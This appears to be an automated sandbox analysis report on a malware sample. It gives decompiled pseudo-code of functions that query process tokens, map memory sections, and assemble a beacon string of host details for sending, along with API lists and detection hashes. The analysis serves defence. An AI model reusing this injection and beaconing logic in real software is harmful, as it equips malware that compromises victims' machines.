                                                                                                                                                                                                                                0x02b8164e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8164e
                                                                                                                                                                                                                                0x02b81612
                                                                                                                                                                                                                                0x02b81617
                                                                                                                                                                                                                                0x02b81620
                                                                                                                                                                                                                                0x02b81624
                                                                                                                                                                                                                                0x02b81646
                                                                                                                                                                                                                                0x02b81646
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81646
                                                                                                                                                                                                                                0x02b81626
                                                                                                                                                                                                                                0x02b8162b
                                                                                                                                                                                                                                0x02b81630
                                                                                                                                                                                                                                0x02b81637
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b8163c
                                                                                                                                                                                                                                0x02b8163f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02B81577), ref: 02B81D74
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: GetVersion.KERNEL32 ref: 02B81D83
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: GetCurrentProcessId.KERNEL32 ref: 02B81D9F
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B81DB8
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL ref: 02B815A1
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000000,00000030,747863F0,00000000), ref: 02B815E8
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02B8161E
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02B8163C
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,02B81064,?,00000000), ref: 02B81673
                                                                                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 02B81685
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02B8168C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(02B81064,?,00000000), ref: 02B81694
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02B816A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3479304935-1084903527
                                                                                                                                                                                                                                • Opcode ID: 06d14b389db4a13932dd9e82f55f16842329ab95381f62b9fe5e5fdf4b335c31
                                                                                                                                                                                                                                • Instruction ID: 4411cf347821fb0b02af356d8ff5bbc5a44cc2e4a37a11c1e2a7bcca764594c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06d14b389db4a13932dd9e82f55f16842329ab95381f62b9fe5e5fdf4b335c31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC317371D12216ABD721BFA8DC44AEE7AFDEF44694F1445A6E50DE7140DB30CA42CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BB6307, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E02BB6307(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02BB5157(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02BB53BB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                                                                                                                0x02bb6314
                                                                                                                                                                                                                                0x02bb6315
                                                                                                                                                                                                                                0x02bb6316
                                                                                                                                                                                                                                0x02bb6317
                                                                                                                                                                                                                                0x02bb6318
                                                                                                                                                                                                                                0x02bb631c
                                                                                                                                                                                                                                0x02bb6323
                                                                                                                                                                                                                                0x02bb6332
                                                                                                                                                                                                                                0x02bb6335
                                                                                                                                                                                                                                0x02bb6338
                                                                                                                                                                                                                                0x02bb633f
                                                                                                                                                                                                                                0x02bb6342
                                                                                                                                                                                                                                0x02bb6345
                                                                                                                                                                                                                                0x02bb6348
                                                                                                                                                                                                                                0x02bb634b
                                                                                                                                                                                                                                0x02bb6356
                                                                                                                                                                                                                                0x02bb6358
                                                                                                                                                                                                                                0x02bb6361
                                                                                                                                                                                                                                0x02bb6369
                                                                                                                                                                                                                                0x02bb636b
                                                                                                                                                                                                                                0x02bb637d
                                                                                                                                                                                                                                0x02bb6387
                                                                                                                                                                                                                                0x02bb638b
                                                                                                                                                                                                                                0x02bb639a
                                                                                                                                                                                                                                0x02bb639e
                                                                                                                                                                                                                                0x02bb63a7
                                                                                                                                                                                                                                0x02bb63af
                                                                                                                                                                                                                                0x02bb63af
                                                                                                                                                                                                                                0x02bb63b1
                                                                                                                                                                                                                                0x02bb63b1
                                                                                                                                                                                                                                0x02bb63b9
                                                                                                                                                                                                                                0x02bb63bf
                                                                                                                                                                                                                                0x02bb63c3
                                                                                                                                                                                                                                0x02bb63c3
                                                                                                                                                                                                                                0x02bb63ce

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BB634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BB6361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BB637D
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BB639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02BB63A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 02BB63B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 02BB63C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                • Opcode ID: d6097635cd13f8146f2eaaa20aafbd8be222b915ed787059b1e00ac9f02e95fd
                                                                                                                                                                                                                                • Instruction ID: df618ddc604796cc2ad391d19d0ad840677bd715d81bc69f98b32d9320302791
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6097635cd13f8146f2eaaa20aafbd8be222b915ed787059b1e00ac9f02e95fd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A210772900218BFDB02DFA4CC45DEEBFBDEF08750F104066FA01E6110D7B19A549BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B812E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                			E02B812E2(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E02B8138A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                                                                                0x02b812eb
                                                                                                                                                                                                                                0x02b812f2
                                                                                                                                                                                                                                0x02b812f3
                                                                                                                                                                                                                                0x02b812f4
                                                                                                                                                                                                                                0x02b812f5
                                                                                                                                                                                                                                0x02b812f6
                                                                                                                                                                                                                                0x02b81307
                                                                                                                                                                                                                                0x02b8130b
                                                                                                                                                                                                                                0x02b8131f
                                                                                                                                                                                                                                0x02b81322
                                                                                                                                                                                                                                0x02b81325
                                                                                                                                                                                                                                0x02b8132c
                                                                                                                                                                                                                                0x02b8132f
                                                                                                                                                                                                                                0x02b81336
                                                                                                                                                                                                                                0x02b81339
                                                                                                                                                                                                                                0x02b8133c
                                                                                                                                                                                                                                0x02b8133f
                                                                                                                                                                                                                                0x02b81344
                                                                                                                                                                                                                                0x02b8137f
                                                                                                                                                                                                                                0x02b81346
                                                                                                                                                                                                                                0x02b81349
                                                                                                                                                                                                                                0x02b8134f
                                                                                                                                                                                                                                0x02b81354
                                                                                                                                                                                                                                0x02b81358
                                                                                                                                                                                                                                0x02b81376
                                                                                                                                                                                                                                0x02b8135a
                                                                                                                                                                                                                                0x02b81361
                                                                                                                                                                                                                                0x02b8136f
                                                                                                                                                                                                                                0x02b8136f
                                                                                                                                                                                                                                0x02b81358
                                                                                                                                                                                                                                0x02b81387

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 02B8133F
                                                                                                                                                                                                                                  • Part of subcall function 02B8138A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02B81354,00000002,00000000,?,?,00000000,?,?,02B81354,00000002), ref: 02B813B7
                                                                                                                                                                                                                                • memset.NTDLL ref: 02B81361
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                • Opcode ID: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction ID: 0b37288e2b44deab3b8995bef67520d385c8395880fea7b922a611d4902cb767
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52210BB2D00209AFCB11DFA9C8849EEFBB9EB48354F108569E509F3610D730AA45CF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02B8138A, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02B8138A(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                                                                                0x02b8139c
                                                                                                                                                                                                                                0x02b813a2
                                                                                                                                                                                                                                0x02b813b0
                                                                                                                                                                                                                                0x02b813b7
                                                                                                                                                                                                                                0x02b813bc
                                                                                                                                                                                                                                0x02b813c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b813c3
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02B81354,00000002,00000000,?,?,00000000,?,?,02B81354,00000002), ref: 02B813B7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: SectionView
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1323581903-0
                                                                                                                                                                                                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction ID: b8d52cb90d3925fd2609bd497f8398ee134e3a97b9df99d21deba71681e9cd17
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F01CB690020CBFEB119FA9DC85CAFBBFDEB44394B108979F156E1190D6309E098A60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02BBA565, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                			E02BBA565(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2bbd018; // 0x9ad51634
				asm("bswap eax");
				_t27 =  *0x2bbd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2bbd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2bbd00c; // 0x13d015ef
				asm("bswap eax");
				_t30 =  *0x2bbd2e0; // 0x273a5a8
				_t3 = _t30 + 0x2bbe633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3f878, _t29, _t28, _t27, _t26,  *0x2bbd02c,  *0x2bbd004, _t25);
				_t33 = E02BB5C12();
				_t34 =  *0x2bbd2e0; // 0x273a5a8
				_t4 = _t34 + 0x2bbe673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E02BB508C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x2bbd2e0; // 0x273a5a8
					_t6 = _t83 + 0x2bbe8cc; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2bbd270, 0, _t96);
				}
				_t97 = E02BB6706();
				if(_t97 != 0) {
					_t78 =  *0x2bbd2e0; // 0x273a5a8
					_t8 = _t78 + 0x2bbe8d4; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2bbd270, 0, _t97);
				}
				_t98 =  *0x2bbd364; // 0x52f95b0
				_a32 = E02BB6DFA(0x2bbd00a, _t98 + 4);
				_t42 =  *0x2bbd308; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2bbd2e0; // 0x273a5a8
					_t11 = _t74 + 0x2bbe8ae; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2bbd304; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2bbd2e0; // 0x273a5a8
					_t13 = _t71 + 0x2bbe885; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t46 = RtlAllocateHeap( *0x2bbd270, 0, 0x800); // executed
					_t100 = _t46;
					if(_t100 != 0) {
						E02BBA425(GetTickCount());
						_t50 =  *0x2bbd364; // 0x52f95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2bbd364; // 0x52f95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2bbd364; // 0x52f95b0
						_t103 = E02BB22AB(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2bbc2ac);
							_push(_t103);
							_t62 = E02BB2629();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02BB2168(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02BB651D();
								}
								RtlFreeHeap( *0x2bbd270, 0, _v44); // executed
							}
							HeapFree( *0x2bbd270, 0, _t103);
						}
						RtlFreeHeap( *0x2bbd270, 0, _t100); // executed
					}
					HeapFree( *0x2bbd270, 0, _a24);
				}
				RtlFreeHeap( *0x2bbd270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                                                                                                                                0x02bba565
                                                                                                                                                                                                                                0x02bba565
                                                                                                                                                                                                                                0x02bba565
                                                                                                                                                                                                                                0x02bba56a
                                                                                                                                                                                                                                0x02bba570
                                                                                                                                                                                                                                0x02bba57a
                                                                                                                                                                                                                                0x02bba57c
                                                                                                                                                                                                                                0x02bba57c
                                                                                                                                                                                                                                0x02bba589
                                                                                                                                                                                                                                0x02bba594
                                                                                                                                                                                                                                0x02bba597
                                                                                                                                                                                                                                0x02bba5a2
                                                                                                                                                                                                                                0x02bba5a5
                                                                                                                                                                                                                                0x02bba5aa
                                                                                                                                                                                                                                0x02bba5ad
                                                                                                                                                                                                                                0x02bba5b2
                                                                                                                                                                                                                                0x02bba5b5
                                                                                                                                                                                                                                0x02bba5c1
                                                                                                                                                                                                                                0x02bba5ce
                                                                                                                                                                                                                                0x02bba5d0
                                                                                                                                                                                                                                0x02bba5d6
                                                                                                                                                                                                                                0x02bba5db
                                                                                                                                                                                                                                0x02bba5e6
                                                                                                                                                                                                                                0x02bba5e8
                                                                                                                                                                                                                                0x02bba5eb
                                                                                                                                                                                                                                0x02bba5ed
                                                                                                                                                                                                                                0x02bba5f2
                                                                                                                                                                                                                                0x02bba5f6
                                                                                                                                                                                                                                0x02bba5f8
                                                                                                                                                                                                                                0x02bba5fd
                                                                                                                                                                                                                                0x02bba609
                                                                                                                                                                                                                                0x02bba60b
                                                                                                                                                                                                                                0x02bba617
                                                                                                                                                                                                                                0x02bba619
                                                                                                                                                                                                                                0x02bba619
                                                                                                                                                                                                                                0x02bba624
                                                                                                                                                                                                                                0x02bba628
                                                                                                                                                                                                                                0x02bba62a
                                                                                                                                                                                                                                0x02bba62f
                                                                                                                                                                                                                                0x02bba63b
                                                                                                                                                                                                                                0x02bba63d
                                                                                                                                                                                                                                0x02bba649
                                                                                                                                                                                                                                0x02bba64b
                                                                                                                                                                                                                                0x02bba64b
                                                                                                                                                                                                                                0x02bba651
                                                                                                                                                                                                                                0x02bba664
                                                                                                                                                                                                                                0x02bba668
                                                                                                                                                                                                                                0x02bba66f
                                                                                                                                                                                                                                0x02bba672
                                                                                                                                                                                                                                0x02bba677
                                                                                                                                                                                                                                0x02bba682
                                                                                                                                                                                                                                0x02bba684
                                                                                                                                                                                                                                0x02bba687
                                                                                                                                                                                                                                0x02bba687
                                                                                                                                                                                                                                0x02bba689
                                                                                                                                                                                                                                0x02bba690
                                                                                                                                                                                                                                0x02bba693
                                                                                                                                                                                                                                0x02bba698
                                                                                                                                                                                                                                0x02bba6a2
                                                                                                                                                                                                                                0x02bba6a4
                                                                                                                                                                                                                                0x02bba6ac
                                                                                                                                                                                                                                0x02bba6bf
                                                                                                                                                                                                                                0x02bba6c5
                                                                                                                                                                                                                                0x02bba6c9
                                                                                                                                                                                                                                0x02bba6d5
                                                                                                                                                                                                                                0x02bba6da
                                                                                                                                                                                                                                0x02bba6e3
                                                                                                                                                                                                                                0x02bba6f4
                                                                                                                                                                                                                                0x02bba6f8
                                                                                                                                                                                                                                0x02bba701
                                                                                                                                                                                                                                0x02bba707
                                                                                                                                                                                                                                0x02bba714
                                                                                                                                                                                                                                0x02bba721
                                                                                                                                                                                                                                0x02bba727
                                                                                                                                                                                                                                0x02bba733
                                                                                                                                                                                                                                0x02bba739
                                                                                                                                                                                                                                0x02bba73a
                                                                                                                                                                                                                                0x02bba73f
                                                                                                                                                                                                                                0x02bba745
                                                                                                                                                                                                                                0x02bba74b
                                                                                                                                                                                                                                0x02bba752
                                                                                                                                                                                                                                0x02bba759
                                                                                                                                                                                                                                0x02bba75f
                                                                                                                                                                                                                                0x02bba766
                                                                                                                                                                                                                                0x02bba76a
                                                                                                                                                                                                                                0x02bba775
                                                                                                                                                                                                                                0x02bba77a
                                                                                                                                                                                                                                0x02bba780
                                                                                                                                                                                                                                0x02bba789
                                                                                                                                                                                                                                0x02bba789
                                                                                                                                                                                                                                0x02bba79a
                                                                                                                                                                                                                                0x02bba79a
                                                                                                                                                                                                                                0x02bba7a9
                                                                                                                                                                                                                                0x02bba7a9
                                                                                                                                                                                                                                0x02bba7b8
                                                                                                                                                                                                                                0x02bba7b8
                                                                                                                                                                                                                                0x02bba7ca
                                                                                                                                                                                                                                0x02bba7ca
                                                                                                                                                                                                                                0x02bba7d9
                                                                                                                                                                                                                                0x02bba7ea

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBA57C
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA5C9
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA5E6
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA609
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA619
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA63B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA64B
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA682
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BBA6A2
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BBA6BF
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BBA6CF
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(052F9570), ref: 02BBA6E3
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(052F9570), ref: 02BBA701
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02BBA714,?,052F95B0), ref: 02BB22D6
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrlen.KERNEL32(?,?,?,02BBA714,?,052F95B0), ref: 02BB22DE
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: strcpy.NTDLL ref: 02BB22F5
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: lstrcat.KERNEL32(00000000,?), ref: 02BB2300
                                                                                                                                                                                                                                  • Part of subcall function 02BB22AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BBA714,?,052F95B0), ref: 02BB231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,02BBC2AC,?,052F95B0), ref: 02BBA733
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                  • Part of subcall function 02BB2629: lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 02BBA752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BBA759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BBA766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 02BBA76A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 02BBA79A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBA7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,052F95B0), ref: 02BBA7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BBA7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 02BBA7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
